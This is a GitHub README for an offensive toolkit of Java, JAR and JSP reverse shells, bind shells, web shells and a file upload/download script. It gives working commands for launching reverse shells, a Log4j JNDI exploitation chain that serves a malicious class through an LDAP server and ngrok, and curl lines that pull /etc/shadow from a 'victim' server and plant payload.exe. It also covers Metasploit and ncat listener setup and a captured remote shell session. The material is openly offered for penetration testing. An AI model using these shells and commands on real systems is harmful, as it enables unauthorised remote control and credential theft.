ivan-sincek / java-reverse-tcp

JAR, Java, and JSP shells that work on Linux OS, macOS, and Windows OS.
MIT License
56 stars 8 forks source link
bind-shell bind-tcp bug-bounty ethical-hacking java-8 log4j networking offensive-security penetration-testing red-team-engagement reverse-shell reverse-tcp security web web-penetration-testing web-shell

Java Reverse TCP

JAR, JSP, and Java files for communicating with a remote host.

Remote host will have a full control over the client and all the underlying system commands.

Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Program will automatically detect an underlying OS.

Works with both ncat and multi/handler.

Built with JDK v8 on Apache NetBeans IDE v17 (64-bit). All the files require Java SE v8 or greater to run.

JAR and Java files were tested with Java v8 update 282 on Windows 10 Enterprise OS (64-bit) and Kali Linux v2023.1 (64-bit).

JSP scripts were tested on Apache Tomcat Version v7.0.100 on XAMPP for Windows v7.4.3 (64-bit).

Made for educational purposes. I hope it will help!

Table of Contents

JAR Shells

Check the source code of JAR files:


Open your preferred console from /jar/ and run the following commands:

java -jar Reverse_Shell.jar 192.168.8.185 9000

java -jar Bind_Shell.jar 9000

Log4j Shells

This PoC was tested on Kali Linux v2021.4 (64-bit).

Change the IP address and port number inside the source files as necessary.

Open your preferred console from /log4j/ and run the following commands:

Compile the source file:

javac ReverseShell.java

Start a local web server from the same directory as the compiled class file (i.e. ReverseShell.class):

python3 -m http.server 9090

python3 -m http.server 9090 --directory somedirectory

Download and build LDAP server:

apt-update && apt-get install maven

git clone https://github.com/mbechler/marshalsec && cd marshalsec && mvn clean package -DskipTests && cd target

Start a local LDAP server and create a reference to the compiled class file on your local web server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:9090/#ReverseShell

Credits to the author for marshalsec!

Give the local LDAP server a public domain with ngrok:

./ngrok tcp 1389

Build the JNDI string (obfuscate it however you like):

${jndi:ldap://x.tcp.ngrok.io:13337/ReverseShell}

JSP Shells

JSP Reverse Shell

Change the IP address and port number inside the script as necessary.

Copy /jsp/jsp_reverse_shell.jsp to your projects's root directory or upload it to your target's web server.

Navigate to the file with your preferred web browser.

JSP Web Shells

Check the simple JSP web shell based on HTTP POST request.

Check the simple JSP web shell based on HTTP GET request. You must URL encode your commands.

JSP File Upload/Download Script

Check the simple JSP file upload/download script based on HTTP POST request for file upload and HTTP GET request for file download.

When downloading a file, you should URL encode the file path, and specify name of the output file.

Case 1: Upload the Script to the Victim’s Server

Navigate to the script on the victim's server with your preferred web browser, or use cURL from you PC.

Upload a file to the victim's server web root directory from your PC:

curl -s -k -X POST https://victim.com/files.jsp -F file=@/root/payload.exe

Download a file from the victim's PC to your PC:

curl -s -k -X GET https://victim.com/files.jsp?file=/etc/shadow -o shadow

If you use reverse shell and you have elevated your initial privileges, this script might not have the same privileges as your shell. To download a certain file, you might need to copy the file to the web root directory and give it necessary read permissions.

Case 2: Upload the Script to Your Server

From your JSP reverse shell, run the following cURL commands.

Upload a file from the victim's PC to your server web root directory:

curl -s -k -X POST https://your-server.com/files.jsp -F file=@/etc/shadow

Download a file from your PC to the victim's PC:

curl -s -k -X GET https://your-server.com/files.jsp?file=/root/payload.exe -o payload.exe

curl -s -k -X GET https://your-server.com/payload.exe -o payload.exe

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up ncat listener:

ncat -nvlp 9000

Set up multi/handler listener:

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 192.168.8.185

set LPORT 9000

exploit

Runtime

┌──(root💀kali)-[~/Desktop]
└─# ncat -nvlp 9000               
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.117.
Ncat: Connection from 192.168.1.117:49895.
Microsoft Windows [Version 10.0.18363.1556]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\W10\Desktop\Reverse Shell>whoami
desktop-4kniu10\w10

C:\Users\W10\Desktop\Reverse Shell>ver

Microsoft Windows [Version 10.0.18363.1556]

C:\Users\W10\Desktop\Reverse Shell>